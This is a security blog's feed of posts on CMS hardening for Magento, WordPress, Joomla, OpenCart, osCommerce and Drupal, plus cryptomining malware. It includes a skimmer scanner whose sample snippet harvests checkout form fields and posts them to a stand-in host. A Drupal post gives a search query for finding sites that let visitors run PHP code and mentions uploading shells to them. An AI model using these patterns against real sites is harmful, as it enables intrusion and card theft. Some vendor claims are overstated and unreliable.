Peter C – Security Blog
https://blog.siteguarding.com (feed generated Thu, 12 Dec 2019 08:08:55 +0000)

Mining Malware Detection and Removal Tips
https://www.siteguarding.com/security-blog/mining-malware/ (Tue, 20 Feb 2018 15:49:59 +0000)

Hidden cryptocurrency mining is not a new topic, yet there are almost no worthwhile technical instructions for detecting and eliminating it, only a lot of scattered information and articles of doubtful content. Why? Because everyone benefits from mining cryptocurrency worldwide, except, of course, the person who does not get a penny from it and does not even suspect that he has become part of a global computer network.

How does it work? It is simple: without the user's knowledge, for example when a file is opened, a mining script is installed, connects to one of the mining pools and begins to produce cryptocurrency. The pools often select the most suitable option for a specific hardware configuration themselves; among them are the Coinhive mining script, Monero mining scripts and JavaScript miners.

Payouts go to the account details of the "employer", who may connect any number of PCs to his account; nobody asks him for evidence that those machines belong to him or that their owners approved this.

That is why pools are an ideal option for building a mining network (botnet) of one's own. And everyone who can be bothered is doing it now, or trying to: from professionals to schoolchildren, regulars of all sorts of "dark forums" full of "trouble-free and tested" schemes.

How to detect and remove

If you notice while visiting a site that your computer has started to make noise and get warm, most likely that site runs hidden mining. Look at the CPU usage statistics: while mining is running, the processor will be heavily loaded. Then scan the entire system for viruses and malware. However, these measures, which you can take on your own, are very superficial.

An integrated approach to the problem is needed. SiteGuarding.com solves this problem quickly and effectively.

Magento vs WordPress: which is the most secure?
https://www.siteguarding.com/security-blog/magento-vs-wordpress-which-is-the-most-secure/ (Thu, 18 Jan 2018 12:29:33 +0000)

Magento is still the most popular ecommerce platform. It is known as the most trusted platform, with a high level of functionality and customizability. WordPress is considered the fastest growing CMS at present. Initially it was associated with blogs, because its main functionality was aimed at easy blog keeping, but its developers have succeeded in turning it into a fully fledged content management system.

Magento or WordPress? Like many similar questions, this one has no single right answer. It depends on the goals you want to achieve.

If your primary aim is to sell products through an online store, it is definitely better to choose the Magento platform: Magento 2 Cloud is created specifically for trading over the Internet. If, on the other hand, you are not interested in ecommerce and just want to create and publish content, WordPress is what you actually need.

WordPress is traditionally famous for its plugins. Besides its own extensions, WordPress offers a multitude of third-party plugins. But there is one sad fact: the security of such third-party products is up in the air, and this is the main point to consider when choosing WordPress for ecommerce.

At the same time, Magento does not need additional plugins in itself; its native functionality is enough for creating secure stores. As a rule, though, the owners of major businesses always try to extend their stores and install various extensions with useful features. All the Magento plugins, by the way, meet the highest security requirements.

Security is what vendors worry about first of all. The main reason is that their customers make online payments and must be assured that their confidential information is under strong protection. So, what makes Magento the most secure platform for ecommerce?

  • Security patches and timely notification

According to the Magento Security Center, 7 security patches were released in 2015 and two more in 2016. Everyone who has joined the security alert registry is informed about security updates immediately, so vendors are always aware of what else they can do to give their stores the highest protection.

  • Free tool for scanning

If you have missed some security news, or simply as a preventive measure, you can always scan your Magento website for free. A dedicated tool scans for and detects vulnerabilities so that you can be sure your website is protected.

  • Availability of multiple security plugins

There is a great number of Magento security extensions. They can set limits on or block threats, scan for vulnerabilities, strengthen passwords and scan for changed files. Some of them can be downloaded from Magento Connect or from reliable third-party websites.

You do, however, need to be careful with Magento 2 extensions and Magento themes. Those pulled down from the Magento Marketplace/Connect are the ones most subject to cyber attack. Remember about updates as well, and always use the latest versions of Magento plugins and Magento templates.

When choosing the best option for organizing your business, pay attention to the following. Although WordPress is easy to use, simple to customize and flexible enough, Magento is a key player in the market of ecommerce platforms. The reason is not only its extended functionality, which allows creating a store from scratch; its main advantage is a high level of security. WordPress-based websites, in contrast, are the most vulnerable to attack: they have no protection system as reliable as Magento's, which always has to deal with payments and the storage of personal data.

10+1 Tips How to Improve the Security of Your Magento 2 Store
https://www.siteguarding.com/security-blog/101-tips-how-to-improve-the-security-of-your-magento-2-store/ (Tue, 31 Oct 2017 05:48:11 +0000)

Security is an issue that online merchants should never ignore, and Magento 2 stores are no exception to this rule. In this article we give some useful tips on how the security of your Magento 2 store can be improved. So, let's start.

Update Your Magento 2 to the Latest Version

The Magento team regularly releases updates of its platform, adding new features and improving old ones, security fixes in particular. So check for the latest updates from time to time to give your web store the latest protection.

Use Reliable Magento 2 Extensions

Magento 2 extensions are popular because they enhance the basic functionality of the platform. However, before installing any extension, make sure it comes from a truly reliable developer, not some fraudster. In addition, it is recommended to download Magento 2 extensions from trustworthy sources such as the Magento Marketplace.

Create Encrypted Connection

If data is transferred over an unencrypted connection, there is a risk that it can be intercepted. This can be prevented by configuring secure URLs right in your Magento 2 Admin Panel.

To do this, go to Stores > Configuration. In the Configuration menu, expand the Web option. In the panel that opens, find the Base URL (Secure) section and expand it. Here you can configure the URLs that establish the encrypted connection.

Use Two-factor Authentication

A strong Magento 2 password alone does not guarantee complete protection of the website from hacker attacks. Consider using two-factor authentication to further improve the security of your Magento 2 store and protect yourself from password-related risks that may appear in the future.

Create Backup Files

Make sure you have a backup of all your web store files in case your store is hacked. Magento 2 Cloud Solution allows you to back up the entire database of your site, including the system and media files.

To perform a backup, click System in your Magento 2 Admin Panel and choose Backups in the Tools section. In the panel that opens you can manage the backup of your files. When the configuration is complete, apply the changes by clicking the Save Config button.

Take Care of Your Email Address

Magento 2 automatically configures the email addresses through which users recover their passwords. If your email account is hacked, your Magento 2 store becomes exposed to hacker attacks. So make sure the email address registered in Magento is not publicly known (change it if needed) and is protected with two-factor authentication.

Limit Admin Access

To ensure that the Admin Panel of your store can only be accessed from a particular IP address, restrict admin access in your Magento 2 settings. First, click System in your Magento 2 Admin Panel and choose User Roles in the Permissions section. In the panel that opens you can manage the user roles in your store by clicking the Add New Role button and assigning the corresponding roles to particular user IDs.

Enable Admin Login CAPTCHA

CAPTCHA is a technology that prevents hackers and even bots from accessing the database of your site. You can enable it in your Magento 2 Admin Panel.

First, click Stores in the Admin Panel and choose Configuration in the Settings section. In the Configuration menu, expand the Advanced section and choose Admin. On the page that opens, expand the CAPTCHA section. Here you can enable CAPTCHA for your web store and configure its settings. Do not forget to save them by clicking the Save Config button.

Configure Action Log

If you use Magento 2 Commerce Edition, you can track store admin activity through the Action Log feature. To enable it, open Stores in your Magento 2 Admin Panel and choose Configuration in the Settings section. In the menu that opens, expand the Advanced tab and choose Admin.

In the window that opens, expand the Admin Actions Logging section. Here you can configure the Action Log settings. When the configuration is complete, save the changes.

Use Security Review Services

Magento security experts can give you useful recommendations on how to increase the protection of your store. Still, their tips do not always solve all the issues you are dealing with. That is why it is recommended to use specialized services that analyze websites for potential security breaches at least once a year. Such checks help you decide how the security of your store can be further improved.

Bonus Tip

The Magento 2 community, which is always ready to help you with any security issues you face, is growing constantly. More importantly, community members regularly publish security reports on the latest versions of Magento 2. So visit the Magento Forums to keep up with the latest Magento 2 security information!

Conclusion

Protecting a web store from hacker attacks should be the number one priority for Magento 2 store owners. Use the tips given in this article to strengthen your site's protection and leave no chance to hackers who may try to breach your security.

6 Tips How To Improve Magento Security
https://www.siteguarding.com/security-blog/6-tips-how-to-improve-magento-security/ (Sat, 07 Oct 2017 21:34:51 +0000)

While working with a Magento-based website you will be surprised by the number of built-in security features. But safety is vital, and additional measures to make your website safer are worth taking. Here is what I suggest:

  1. Keep ahead of Magento security updates. Magento developers are working flat out to provide merchants with a more powerful security system. They try to consider all possible risks and prevent them from happening. As a result, new Magento versions are full of features that close detected security risks.
  2. Don't be rash! Avoid simple passwords that include your date of birth and the like. Use random combinations of letters and digits and change them regularly. And do not use the same or slightly similar passwords for your multiple accounts. This protects you regardless of which CMS you use, even for accounts that have nothing to do with your store.
  3. If you are the happy owner of a large business, you need more people engaged in store operation, which considerably increases the risk of a break-in. It is a mistake to give one shared access to all administrative staff; it is more reasonable for them to use separate user accounts.
  4. In the ocean of Magento extension development companies, choose only verified extension developers. It is good to test something new, and in general experimenting is the best way to select the most suitable things. But remember that when security is at stake it is better to pass up experiments and choose well-tried products.
  5. You know that failures (equipment failure, staff mistakes, force majeure and so on) kill businesses. In this light you should always have a backup of your data. Ideally, make more than a single backup and take backups of your website data regularly. This will go straight into restoring your website in case of a security breach.
  6. Let two-factor authentication become a habit. A random password is good, but it does not guarantee that an experienced hacker will never discover even a well-made password. Sending a login code to a mobile device is a good and widespread practice. It protects your store from unauthorized logins.

What other measures may be taken to keep a website protected? I’m looking forward to your personal recommendations! See you soon!

Why Magento Security is Important
https://www.siteguarding.com/security-blog/why-magento-security-is-important/ (Wed, 26 Jul 2017 11:13:54 +0000)

The Magento content management system was developed in the US in 2007 by the well-known company Varien. The free Magento CMS is open-source software, built on the Zend Framework and running on UNIX operating systems. The CMS is primarily suited to developing large online stores. There are already over 100,000 online resources on this platform all over the world.

Opportunities and features of Magento

On a single Magento installation you can quickly create several Internet resources and manage them at the same time, which is very convenient for administration. The catalog system is well structured, and products can be compared. Flexible management of product prices, stock additions and gift certificates makes working with the system convenient both for the site administrator and for the buyer, who can choose discounted goods and sort them by certain characteristics.

Additionally, Magento offers good opportunities for search engine optimization: access to the HTML code; the possibility of adding meta description and keyword tags to each product or category; a custom URL ending for each product; and Magento itself generates an XML sitemap for the search engines. Magento also provides a multi-currency and currency conversion system, a convenient function for customers regardless of the country they are in.

If you want to run your online store on Magento without using ready-made templates, you will need knowledge of HTML markup and CSS styles. To work with this CMS, though, it is best to hire a specialist in the field.

In addition to the platform, free and paid modules are available that extend the functions of the CMS. Free ones should first be checked on a test installation, since many low-quality ones are encountered. Paid modules come with free technical support from their developers.

So, Magento CMS is a solid, high-quality platform that is great for creating an online store. In some ways it can be difficult for an inexperienced user, but its capabilities are much wider than those of other similar platforms. And if a function is missing from the basic configuration, you can add extra modules; at the moment there are more than four thousand different extensions.

Magento Security

The most popular recent use of a hacked Magento site is the installation of a spy script that watches forms and sends the values entered into them to the hacker. The hacker thus gets the details of the bank cards with which customers pay for purchases in the store, as well as the personal data of the cardholder: that is, all the values the buyer enters at the checkout stage.

The script is loaded on every page of the store, but it is active only where sensitive data is entered. Usually these are the ordering pages, whose addresses contain the fragments "onepage", "checkout" or "onestep". The script extracts the data from the form fields (input, select, textarea, checkbox), builds a message from them and sends it to the attacker's site via Ajax.
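A defender's first pass at finding such a script is to look for files that show all three behaviours at once: a checkout-URL check, bulk reading of form fields, and a request to a foreign host. The scanner below is an added example (not code from this blog or from Magento); it assumes PHP 7.4 or later, the file types and indicator strings are assumptions, and the two sample files it scans are constructed here.

```php
<?php
// Heuristic scan for the form-skimming script described above. It walks a
// directory of store files (.js, .phtml, .html) and flags a file only when
// it combines all three behaviours the post describes:
//   (1) a check of the current URL for a checkout-page fragment,
//   (2) bulk reading of form fields,
//   (3) an outbound request to a host other than the store's own.
// A hit is a lead for manual review, not proof of infection.
declare(strict_types=1);

const CHECKOUT_FRAGMENTS = ['onepage', 'checkout', 'onestep'];
const FIELD_HARVESTERS   = ['getElementsByTagName', 'querySelectorAll', 'FormData', 'serialize('];
const SENDERS            = ['XMLHttpRequest', 'fetch(', 'sendBeacon', '.ajax(', '.post(', 'Image()'];

/** Return the needles that occur (case-insensitively) in $code. */
function indicators_present(string $code, array $needles): array
{
    return array_values(array_filter($needles, fn(string $n) => stripos($code, $n) !== false));
}

/** Hosts named in http(s) URLs inside $code that differ from the store's own host. */
function external_hosts(string $code, string $ownHost): array
{
    preg_match_all('~https?://([a-z0-9.-]+)~i', $code, $m);
    $hosts = array_unique(array_map('strtolower', $m[1]));
    return array_values(array_filter($hosts, fn(string $h) => $h !== strtolower($ownHost)));
}

/** Analyse one file's source: null when not suspicious, else the matched indicators. */
function scan_source(string $code, string $ownHost): ?array
{
    $frag   = indicators_present($code, CHECKOUT_FRAGMENTS);
    $fields = indicators_present($code, FIELD_HARVESTERS);
    $send   = indicators_present($code, SENDERS);
    $ext    = external_hosts($code, $ownHost);
    if ($frag && $fields && $send && $ext) {
        return ['fragments' => $frag, 'fields' => $fields, 'senders' => $send, 'external_hosts' => $ext];
    }
    return null;
}

/** Scan every .js/.phtml/.html file under $dir; returns path => indicators for hits. */
function scan_directory(string $dir, string $ownHost): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        if (!preg_match('/\.(js|phtml|html)$/i', $file->getFilename())) {
            continue;
        }
        $code = file_get_contents($file->getPathname());
        if ($code !== false && ($result = scan_source($code, $ownHost)) !== null) {
            $hits[$file->getPathname()] = $result;
        }
    }
    return $hits;
}

// Constructed samples, not real code from any store. The legitimate one is a
// same-origin checkout helper; the suspicious one shows only the indicator
// shape (the harvesting logic is elided) with an external collector host.
$legit = "if (location.pathname.indexOf('checkout') !== -1) {\n"
       . "  jQuery.ajax({url: 'https://shop.example/rest/V1/carts/mine/totals'});\n}\n";
$suspect = "if(location.href.indexOf('onepage')>-1||location.href.indexOf('checkout')>-1){\n"
         . "  var f=document.getElementsByTagName('input'); /* ...collect values... */\n"
         . "  var x=new XMLHttpRequest(); x.open('POST','https://collector.invalid/s');\n}\n";

$dir = sys_get_temp_dir() . '/skimmer-scan-' . getmypid();
mkdir($dir . '/js', 0700, true);
file_put_contents($dir . '/js/checkout-totals.js', $legit);   // should pass
file_put_contents($dir . '/js/jquery.min.js', $suspect);      // should be flagged

foreach (scan_directory($dir, 'shop.example') as $path => $why) {
    echo "SUSPICIOUS: $path\n";
    foreach ($why as $kind => $values) {
        echo "  $kind: " . implode(', ', $values) . "\n";
    }
}

// Tidy up the constructed sample directory.
array_map('unlink', glob($dir . '/js/*'));
rmdir($dir . '/js');
rmdir($dir);
```

Point `scan_directory()` at a store's `pub/static` or `app/design` tree with the store's real hostname; the same-origin checkout helper is not reported, while the file that names an outside host is.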

To ensure Magento security, it is necessary to install the security patches issued by the manufacturer in a timely manner.

How to Harden Joomla Security
https://www.siteguarding.com/security-blog/how-to-harden-joomla-security/ (Wed, 26 Jul 2017 09:42:18 +0000)

A virus is a piece of software, and it does not get onto a site out of thin air. A virus is brought to the site after a hack, or the owner (administrator) of the site introduces it along with extensions and templates. Let's consider the 6 main points of "entry" of viruses onto a site.

1. Hacking the hosting provider's server

Any hosting provider's service is, in fact, a large computer that is also exposed to attacks and infections. Unfortunately, if your sites are hosted on a service that has been or is being attacked, you can only react after the fact, that is, eliminate the consequences of the hack or attack.

Protection against the hacking of the hosting provider's service can only be preventive.

When choosing a hosting provider, choose only trusted, top-end services. Note whether the hosting provider uses its own data center or rents one. In reviews of the hosting provider, pay attention to the statistics of its downtime and site unavailability.

Site "defenders" have a first "golden" rule: for each domain (site), create a separate user account. This is practically impossible on shared hosting (where you are allowed to create 2-20 sites under the same account), but it is quite feasible on VDS servers. Separating sites by account isolates them from each other, so that when one site is infected, the other sites of the account are not infected in the same way.

2. Hacking the site through "holes", i.e. CMS vulnerabilities

Any content management system (CMS) eventually becomes vulnerable, and Joomla is no exception. That is why it is important for Joomla security to monitor system updates and periodically apply the new security releases.

3. Hacking CMS Joomla

The methods of hacking a CMS are as follows:

– Hacking the website and uploading shells and backdoors through various upload forms: photos, media files and other files;
– Introducing malicious code through spam mailings or SQL injection;
– Theft of site administrator credentials (SQL injection, XSS attacks, brute force);
– Website infection through third-party extensions and templates;
– Downloading extensions and templates from blogs and webmasters' sites, even the most famous ones, is a direct route to possible infection of the site. Sometimes an extension passed along a chain from user to user leads to mass infection;
– Also not recommended are all kinds of "torrent" trackers offering a free download of a paid extension or template.

4. Hacking the Joomla site with a brute force attack

A brute-force attack is the guessing of the site administrator's username and password. This loophole is closed by complex administrator passwords and by changing the administrator's username from "admin" to something else.

5. Website hijacking by FTP interception

It is impossible to manage a site without access to its directory over FTP. The FTP protocol is quite exposed, and it would be strange if attackers did not try to use this loophole. To protect yourself, use the SFTP protocol, create a separate FTP account for each site and do not store passwords in the FTP client.

6. Unprofessionalism of hired freelancers

If you do not maintain the site yourself and hire freelancers to change the design or do other work, infection with virus code is possible.

How to harden WP security
https://www.siteguarding.com/security-blog/how-to-harden-wp-security/ (Wed, 26 Jul 2017 09:36:48 +0000)

Many have seen reports that yet another site was hacked. Perhaps some have personally come across this. How can a site be hacked, and what protective measures can be taken? We will talk about what needs to be done to protect your site and not become a victim of hackers.

Hacking a site means gaining unauthorized access to the site's files or to the administration panel of its content management system.

In this article we will not consider hacking the hosting on which the site runs, and will focus only on hacking the site itself.

First of all, note that if you do not do anything, then sooner or later the site will be hacked!

The fact is that modern WordPress sites have about 500 thousand lines of code. This code is for the most part open, and anyone can analyze it, including for vulnerabilities. In such a huge mass of code, sooner or later an error will be found, and attackers will want to use it.

A site on a standard platform such as WordPress can be recognized by its signature features. By crawling your site against a set of signatures, one can find out a lot of details: the name and version of the platform, which plugins and extensions are installed and their versions, the list of users, and so on.

There is a huge number of different online scanners that constantly scan the network in search of sites based on this platform. Your site being scanned by one of them is only a matter of time.

In order to make it difficult to scan your site, you can install plugins that will hide the version of WordPress.

It is extremely important for WordPress security to update periodically. Updates not only close the vulnerabilities found but can also contain new and improved functionality and improve the site's performance. Before updating, however, make a backup copy of the site in case the developers made an error in the update or something else goes wrong. It is also important to check the site after each update.

A common way to hack a site is to get the password to its administrative panel. How do hackers get passwords? They intercept a password transmitted over the unprotected HTTP protocol, guess it by brute force, or decrypt it after gaining access to the site database.

The best protection against interception is to use the secure HTTPS protocol instead of HTTP: the entire site, or at least its administrative panel, should be accessible only over HTTPS. This requires an SSL certificate. Certificates from a certification authority cost money and have a finite period of validity.

Brute force is a very common method of attacking WordPress sites on the network. Of course, nobody guesses passwords by hand; there are special programs for it.

To ensure security, set a password on the wp-admin folder, change the address of the administrative login page, secure the login and forgotten-password pages, disable the error message for a wrong password, and prohibit the enumeration of all users.
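Three of these measures can be applied without a third-party plugin. The must-use plugin below is an added example, not code from this blog or from WordPress itself; it uses only standard WordPress hooks (`login_errors`, `template_redirect`, `rest_endpoints`, `wp_login_failed`, `authenticate`, `wp_login`), the attempt limit and lockout time are assumed values, and it assumes `REMOTE_ADDR` is the real client address.

```php
<?php
/**
 * Plugin Name: Login hardening (added example)
 * Description: A generic login error, a block on user enumeration, and a
 * lockout after repeated failed logins. Save as
 * wp-content/mu-plugins/login-hardening.php; WordPress loads it automatically.
 */
if (!defined('ABSPATH')) {
    exit; // direct requests to this file get nothing
}

const LH_MAX_ATTEMPTS    = 5;   // failed logins allowed per client...
const LH_LOCKOUT_SECONDS = 900; // ...before a 15-minute lockout (assumed values)

// 1. Wrong-password and unknown-user errors become one generic message, so a
//    failed attempt no longer confirms whether the username exists.
add_filter('login_errors', function ($error) {
    return 'Invalid login credentials.';
});

// 2. User enumeration: WordPress redirects /?author=N to /author/<login>/,
//    which leaks the login name. Refuse numeric author queries outright.
add_action('template_redirect', function () {
    if (isset($_GET['author']) && preg_match('/^\d+$/', (string) $_GET['author'])) {
        wp_die('Forbidden', 'Forbidden', ['response' => 403]);
    }
});

//    The REST API lists users publicly at /wp-json/wp/v2/users; hide those
//    routes from anyone who is not logged in.
add_filter('rest_endpoints', function ($endpoints) {
    if (!is_user_logged_in()) {
        unset($endpoints['/wp/v2/users'], $endpoints['/wp/v2/users/(?P<id>[\d]+)']);
    }
    return $endpoints;
});

// 3. Brute force: count failures per client address in a transient and refuse
//    further attempts once the limit is reached. Assumes REMOTE_ADDR is the
//    real client; behind a reverse proxy use the proxy's trusted header instead.
function lh_client_key()
{
    $ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
    return 'lh_fail_' . md5($ip);
}

add_action('wp_login_failed', function () {
    $key = lh_client_key();
    $n   = (int) get_transient($key);
    if ($n < LH_MAX_ATTEMPTS) {
        // Stop incrementing at the limit so the lockout expires on schedule.
        set_transient($key, $n + 1, LH_LOCKOUT_SECONDS);
    }
});

// Priority 30 runs after WordPress's own username/password check (priority 20),
// so the lockout applies whether or not the submitted password was right.
add_filter('authenticate', function ($user, $username, $password) {
    if ((int) get_transient(lh_client_key()) >= LH_MAX_ATTEMPTS) {
        return new WP_Error('too_many_attempts', 'Too many failed login attempts. Try again later.');
    }
    return $user;
}, 30, 3);

// A successful login clears the counter for that client.
add_action('wp_login', function () {
    delete_transient(lh_client_key());
});
```

The password on the wp-admin folder and the renamed login address are web-server matters (HTTP basic authentication and a rewrite rule) rather than WordPress hooks, so they are not covered here.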

Unfortunately, you will not be able to secure your site from hacking completely: you need to close every possible loophole, while the attacker needs to find only one. But do not be discouraged. If you follow the security rules, hacking your site will be extremely difficult and time-consuming.

How to Secure OpenCart CMS
https://www.siteguarding.com/security-blog/how-to-secure-opencart-cms/ (Tue, 25 Jul 2017 11:13:25 +0000)

OpenCart, like some other CMSs, can be called a relatively secure platform. As with other content management systems, however, it is better to take care of security and protect your site from hacking by unauthorized persons right away. In this article we give basic tips that will help you improve the security of your OpenCart site. The article is primarily for those who run online stores built on OpenCart, but the tips are fairly universal, so they will be of interest to owners of sites on other CMSs too.

1. Hiding the login to the administrative panel

By default, the admin panel is entered at your_site/admin. Naturally, the more information hackers have, the easier it is for them to hack your site. So the first recommendation is to change the login address of the admin panel from /admin to something else: /manager, /panel or something even more complicated.

How to do it: in the file manager or in phpMyAdmin, first rename the "admin" folder; second, make the same replacement in the "config.php" file inside the renamed folder; third, sometimes you also need to change the "config.php" file in the root folder (check whether "admin" is mentioned there).

2. Change the administrator’s login and password

After changing the address of the panel, it is worth thinking about changing the login, which by default is also "admin". Note that this is the default login used on many CMSs, so even if your store or site is not on OpenCart, I still advise you to change it immediately.

How to do it: go to the admin panel, select "System", then "Users" and again "Users". Find the row with the login "admin", open its settings and change the login to another one.

Right there you can also change the password, and I strongly recommend doing so, creating a password no shorter than ten characters. If you cannot come up with one yourself, use one of the online password generators that can easily be found in Google.

3. Change access rights for important files

Two files, config.php in the root folder and config.php in the folder called admin by default (renamed above), contain important information about the database, so it is recommended to change the permissions on these files to read-only.

How to do it: you can change the permissions with any tool you use for working with files. The easiest way is to change them directly in the hosting control panel.

4. Disabling error display

As a rule, when hacking websites, hackers use various loopholes, and the error messages displayed on incorrect actions are often very helpful to them. Therefore, I recommend not displaying these errors.

Here you will most likely ask: but what if I need to look at the errors? For that you can use the error log file (its name is set in the same block of the settings).

You can view it by going to the root folder of the site, then into system and then into logs.

How to do it: go to the admin panel, choose "System", then "Settings"; in the settings open the "Server" tab, and at the bottom there will be the "Errors" block, where you should set "Show errors" to "No".

How to Protect osCommerce CMS from Hackers
https://www.siteguarding.com/security-blog/how-to-protect-oscommerce-cms-from-hackers/ (Tue, 25 Jul 2017 10:35:50 +0000)

osCommerce is one of the most popular content management systems for online stores. Its main advantages are a wide variety of modules and functions that allow you to create a store of any complexity and structure. However, it requires a certain professionalism.

osCommerce is a free, open-source CMS that can be downloaded from the system's official portal, where the necessary modules and add-ons are also available. Help and support can always be obtained in the osCommerce community, whose participants, by the way, have created a significant number of the system's additional functions.

So today we will talk about the security of osCommerce online stores and safe behavior on the Internet.

Hacking an online store is dangerous for both sides, the shop owner and the customers. From a hacked store, attackers steal confidential information: customer contacts, bank card numbers and other valuable data. Hackers can break the store completely. As a result, the seller loses reputation and the buyers lose their privacy.

There are a lot of ways to protect your online store from hacking. In this article we will talk about the most accessible.

1. Encrypt the connection

Install an SSL certificate on the server of your online store to enable a secure connection between the buyer's browser and the store. Such a connection is almost impossible to hack. An SSL connection is therefore a must-have for any site that processes customers' personal data.

2. Timely updates

Hackers are constantly finding new vulnerabilities in software: the operating system, the browser, the CMS. You need to close these security holes quickly with updates.

3. Two-step authorization

Two-step authorization is one of the most reliable ways to protect against hacking, which is why Internet banks use it.

After entering the login and password, you receive a message on your phone with an access code. Logging in to the site is possible only after entering this code in a special field on the authorization page. Even if an attacker obtains your password, he cannot enter the site without your mobile phone.

4. Using Password Managers

For osCommerce security you need to use complex passwords, unique to each resource. So as not to keep all the passwords in your head or on a piece of paper under the keyboard, use a password manager. It will generate reliable passwords for you and store them. The passwords in the manager can be accessed only with a master password, so that is the only one you need to remember.

5. Protect devices

All the previous methods protect you against hacking through software. But you may come across a truly desperate attacker who will try to get access to your devices.

Imagine that an attacker has access to the computer from which you manage the site, and the browser is configured to auto-fill passwords. Now the access is in his hands.

To protect your devices, set up encryption. The simplest step is to set an administrator password for logging in to the computer and a lock screen on the mobile device.

But it is better to use full encryption; different devices have different methods.

These methods are just the tip of the security iceberg. So start using them now if you are not already.

How to Hack Website on Drupal CMS
https://www.siteguarding.com/security-blog/how-to-hack-website-on-drupal-cms/ (Tue, 25 Jul 2017 10:23:28 +0000)

Drupal is one of the most famous and popular open-source CMSs in PHP. The CMS itself is built on sound principles with an eye to security guidelines. Architecturally Drupal is a very secure system; security fixes for the core and modules come out quickly, and hacking it through holes is not so easy.

Drupal is reliable in itself. Only the use of unverified modules, programmer errors in custom modules written for the site, server configuration errors or non-compliance with the basics of Drupal security can be the reason for a hack.

The Drupal Security team very often issues security advisories for vulnerabilities of critical level. So Drupal is safe only for the time being, until a new version comes out and the fixed vulnerability is revealed to every hacker. Drupal sites that are not updated immediately after a security release are often attacked.

As with other CMSs, most vulnerabilities come from various plugins, themes and other custom functionality. It is most convenient to have a tool that shows the versions of Drupal and its components; knowing them, you can search for known vulnerabilities.

Usually vulnerabilities are found by bots, programs written by hackers to search the Internet for sites on various CMSs. Bots perform basic actions, for example trying to register or to log in as admin with the password 11111, as well as more complex ones. If the site does have a vulnerability, the bot exploits it and sends information to the hacker's database of broken sites; the attacker can then perform illegal actions if your site is profitable, for example if it has high traffic.

But now we will talk about a vulnerability of another kind, namely the carelessness, oversights and sloppiness of those web developers who give anonymous and other users access to the "PHP Code" input format. It allows anyone to run arbitrary PHP code without access to the site admin area. Every Drupal security guide says to be careful with the built-in "PHP Code" module and not to give strangers access to it, let alone unauthorized visitors. But, as we will see, these requirements are often neglected…

The all-powerful Google will help us search for vulnerable Drupal sites. Its search operators allow finding sites by many very interesting parameters. We will look for indexed content-editing pages where one (or the only) input filter is "PHP code".

Search algorithm:
1. The page URL must contain "node" and "edit";
2. The page text must mention the phrase "You may post PHP code".

The "inurl" operator, which finds pages with certain words in the URL, in our case "node" and "edit", will help us here.

The search for these criteria is performed with the query: inurl:node inurl:edit "You may post PHP code"

You will then see a list of vulnerable Drupal sites. Obviously, many of them have already been used by spammers.

What can be done with such a site? Upload a shell, spam it, scan the server.

How to protect yourself from this? Disable the "PHP Code" module. If that is not possible at all, limit the rights to it to the minimum number of people, preferably only the chief administrator.
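A site owner can check their own installation for exactly this misconfiguration before anyone else does. The script below is an added example, not code from this blog or from the Drupal project; it assumes Drupal 7, where the PHP filter module registers the text format `php_code` and access to it is the permission `use text format php_code`, and it is meant to be run from the site root with `drush php-script`.

```php
<?php
// Audit for the "PHP Code" format exposure discussed above.
// Run from the Drupal root:  drush php-script php-format-audit.php
// Assumes Drupal 7 (format machine name 'php_code'; permission
// 'use text format php_code'; role ids 1 = anonymous, 2 = authenticated).

function php_format_audit()
{
    $report = [
        'module_enabled' => module_exists('php'),
        'format_exists'  => false,
        'roles'          => [],   // rid => role name for roles that may use the format
        'exposed'        => false, // true when anonymous or authenticated users hold it
    ];
    if (!$report['module_enabled']) {
        return $report;
    }
    $format = filter_format_load('php_code');
    $report['format_exists'] = $format !== false;
    if (!$report['format_exists']) {
        return $report;
    }
    // user_roles() with a permission argument returns every role holding it.
    $roles = user_roles(FALSE, 'use text format ' . $format->format);
    foreach ($roles as $rid => $name) {
        $report['roles'][$rid] = $name;
        if (in_array((int) $rid, [DRUPAL_ANONYMOUS_RID, DRUPAL_AUTHENTICATED_RID], true)) {
            $report['exposed'] = true;
        }
    }
    return $report;
}

$r = php_format_audit();
if (!$r['module_enabled']) {
    echo "PHP filter module is disabled: nothing to fix.\n";
} elseif (!$r['format_exists']) {
    echo "PHP filter module is enabled but the php_code format does not exist.\n";
} else {
    $names = $r['roles'] ? implode(', ', $r['roles']) : 'none';
    echo "Roles allowed to use the PHP code format: $names\n";
    if ($r['exposed']) {
        echo "EXPOSED: anonymous or authenticated users can run PHP."
           . " Disable the module (drush dis php) or revoke the permission.\n";
    } else {
        echo "OK: only privileged roles hold the permission; consider disabling the module anyway.\n";
    }
}
```

User 1 bypasses all permission checks in Drupal 7, so an empty role list still leaves the site administrator able to use the format; that is the "only the chief administrator" state the post recommends.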

So do not commit such nonsense; keep your core and modules up to date and your site will be safe!
